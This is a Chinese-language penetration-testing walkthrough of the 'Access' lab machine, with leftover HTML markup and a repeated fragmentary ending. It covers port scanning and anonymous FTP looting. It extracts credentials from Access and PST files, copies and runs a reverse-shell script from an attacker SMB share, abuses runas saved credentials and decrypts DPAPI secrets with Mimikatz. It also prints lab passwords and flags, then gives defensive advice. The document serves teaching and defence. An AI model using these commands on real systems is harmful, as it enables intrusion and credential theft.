Access 渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Masscan进行快速端口扫描：<\/p>
sudo masscan -p1-65535,U:1-65535 10.10.10.98 --rate=<\/span>1000<\/span> -p1-65535,U:1-65535 -e tun0 > \/tmp\/ports
<\/span><\/span>ports=<\/span>$(<\/span>cat \/tmp\/ports | awk -F " "<\/span> '{print $4}'<\/span> | awk -F "\/"<\/span> '{print $1}'<\/span> | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>nmap -Pn -sV -sC -p$ports 10.10.10.98
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

21\/tcp<\/strong>: FTP (Microsoft ftpd)，允许匿名登录<\/li>
23\/tcp<\/strong>: Telnet (Microsoft Windows XP telnetd)<\/li>
80\/tcp<\/strong>: HTTP (Microsoft IIS 7.5)<\/li>
<\/ul>
1.2 服务识别<\/h3>
FTP服务<\/strong>：<\/p>

匿名登录允许<\/li>
系统类型：Windows_NT<\/li>
<\/ul>
Telnet服务<\/strong>：<\/p>

提供NTLM信息：

Target_Name: ACCESS<\/li>
NetBIOS_Domain_Name: ACCESS<\/li>
NetBIOS_Computer_Name: ACCESS<\/li>
DNS_Domain_Name: ACCESS<\/li>
DNS_Computer_Name: ACCESS<\/li>
Product_Version: 6.1.7600<\/li>
<\/ul>
<\/li>
<\/ul>
HTTP服务<\/strong>：<\/p>

服务器：Microsoft-IIS\/7.5<\/li>
标题：MegaCorp<\/li>
潜在风险方法：TRACE<\/li>
<\/ul>
2. 初始访问<\/h2>
2.1 FTP匿名登录<\/h3>
wget -r --no-passive-ftp ftp:\/\/anonymous:a@10.10.10.98
<\/span><\/span><\/code><\/pre>获取文件：<\/p>

backup.mdb<\/code> - Microsoft Access数据库备份文件<\/li>
<\/ul>
2.2 MDB文件分析<\/h3>
使用mdb-tools<\/code>分析Access数据库：<\/p>
mdb-tables backup.mdb | grep --color=<\/span>auto user
<\/span><\/span>mdb-export backup.mdb auth_user
<\/span><\/span><\/code><\/pre>发现用户凭证：<\/p>



id<\/th>
username<\/th>
password<\/th>
Status<\/th>
last_login<\/th>
RoleID<\/th>
Remark<\/th>
<\/tr>
<\/thead>


25<\/td>
admin<\/td>
admin1<\/td>
0<\/td>
8\/23\/18 21:11:47<\/td>
26<\/td>
27<\/td>
<\/tr>

<\/td>
engineer<\/td>
access4u@security<\/td>
0<\/td>
8\/23\/18 21:13:36<\/td>
26<\/td>
28<\/td>
<\/tr>

<\/td>
backup_admin<\/td>
admin108<\/td>
0<\/td>
8\/23\/18 21:14:02<\/td>
26<\/td>
<\/td>
<\/tr>
<\/tbody>
<\/table>
2.3 Outlook PST文件分析<\/h3>
发现Access Control.zip<\/code>文件，使用密码access4u@security<\/code>解压：<\/p>
7z l -slt Access\ <\/span>Control.zip
<\/span><\/span>7z x Access\ <\/span>Control.zip
<\/span><\/span><\/code><\/pre>提取PST文件内容：<\/p>
readpst -tea -m Access\ <\/span>Control.pst
<\/span><\/span><\/code><\/pre>获取凭证：<\/p>

username: security<\/li>
password: 4Cc3ssC0ntr0ller<\/li>
<\/ul>
2.4 Telnet登录<\/h3>
使用获取的凭证登录Telnet：<\/p>
telnet 10.10.10.98
<\/span><\/span><\/code><\/pre>成功获取user flag：

73fa98942d74fda472f164a668838635<\/code><\/p>
3. 权限提升<\/h2>
3.1 Runas利用<\/h3>

准备PowerShell反向shell脚本<\/li>
通过SMB共享传输到目标机器：<\/li>
<\/ol>
impacket-smbserver share \/tmp\/ -smb2support
<\/span><\/span><\/code><\/pre>目标机器执行：<\/p>
copy<\/span> \\10.10.16.6\share\rev.ps1 .
<\/span><\/span>powershell -ExecutionPolicy Bypass -File "C:\Users\security\rev.ps1"<\/span>
<\/span><\/span><\/code><\/pre>
检查保存的凭据：<\/li>
<\/ol>
cmdkey \/list
<\/span><\/span><\/code><\/pre>发现已保存的Administrator凭据<\/p>

利用保存的凭据执行命令：<\/li>
<\/ol>
runas \/user:ACCESS\Administrator \/savecred "powershell -ExecutionPolicy Bypass -File "<\/span>C:\Users\security\rev.ps1""<\/span>
<\/span><\/span><\/code><\/pre>3.2 DPAPI滥用与Mimikatz<\/h3>

获取当前用户SID：<\/li>
<\/ol>
(Get-WmiObject -Class Win32_UserAccount -Filter "Name='security'"<\/span> ).SID
<\/span><\/span><\/code><\/pre>
查找凭据文件：<\/li>
<\/ol>
dir<\/span> \/S \/AS C:\Users\security\AppData\Local\Microsoft\Vault
<\/span><\/span>dir<\/span> \/S \/AS C:\Users\security\AppData\Local\Microsoft\Credentials
<\/span><\/span>dir<\/span> \/S \/AS C:\Users\security\AppData\Local\Microsoft\Protect
<\/span><\/span>dir<\/span> \/S \/AS C:\Users\security\AppData\Roaming\Microsoft\Vault
<\/span><\/span>dir<\/span> \/S \/AS C:\Users\security\AppData\Roaming\Microsoft\Credentials
<\/span><\/span>dir<\/span> \/S \/AS C:\Users\security\AppData\Roaming\Microsoft\Protect
<\/span><\/span><\/code><\/pre>
提取凭据文件和主密钥：<\/li>
<\/ol>
[Convert]<\/span>::ToBase64String([IO.File]<\/span>::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290"<\/span>))
<\/span><\/span>[Convert]<\/span>::ToBase64String([IO.File]<\/span>::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580"<\/span>))
<\/span><\/span><\/code><\/pre>
使用Mimikatz分析：<\/li>
<\/ol>
dpapi::cred \/in:51AB168BE4BDB3A603DADE4F8CA81290 \/sid:S-1-5-21-953262931-566350628-63446256-1001 \/password:4Cc3ssC0ntr0ller
dpapi::masterkey \/in:0792c32e-48a5-4fe3-8b43-d93d64590580 \/sid:S-1-5-21-953262931-566350628-63446256-1001 \/password:4Cc3ssC0ntr0ller
dpapi::cred \/in:51AB168BE4BDB3A603DADE4F8CA81290
<\/code><\/pre>
获取管理员凭据：<\/p>

username: administrator<\/li>
password: 55Acc3ssS3cur1ty@megacorp<\/li>
<\/ul>
3.3 获取Root Flag<\/h3>
使用管理员凭据获取root flag：

ec98536f795aca4c117bad2bc689f96c<\/code><\/p>
4. 关键知识点总结<\/h2>

FTP匿名登录<\/strong>：检查FTP服务是否允许匿名访问，可能泄露敏感文件<\/li>
MDB文件分析<\/strong>：使用mdb-tools工具分析Microsoft Access数据库文件<\/li>
Outlook PST文件<\/strong>：包含邮件和潜在凭证，使用readpst工具提取内容<\/li>
Runas利用<\/strong>：Windows保存的凭据可通过runas命令利用<\/li>
DPAPI滥用<\/strong>：Windows数据保护API存储的凭据可通过Mimikatz提取<\/li>
凭证存储位置<\/strong>：

AppData\Roaming\Microsoft\Credentials<\/code><\/li>
AppData\Roaming\Microsoft\Protect<\/code><\/li>
<\/ul>
<\/li>
Mimikatz使用<\/strong>：提取DPAPI保护的凭据需要主密钥文件和用户密码<\/li>
<\/ol>
5. 防御建议<\/h2>

禁用FTP匿名登录<\/li>
加密存储数据库备份文件<\/li>
避免在邮件中存储敏感凭证<\/li>
限制runas命令的使用和凭据保存<\/li>
定期审计DPAPI保护的凭据<\/li>
使用强密码策略，避免密码重用<\/li>
监控异常进程如Mimikatz的执行<\/li>
<\/ol>
Access 渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 初始访问<\/h2>

3.3 获取Root Flag<\/h3> 使用管理员凭据获取root flag： ec98536f795aca4c117bad2bc689f96c<\/code><\/p>

3.3 获取Root Flag<\/h3>
使用管理员凭据获取root flag：
`ec98536f795aca4c117bad2bc689f96c<\/code><\/p>`
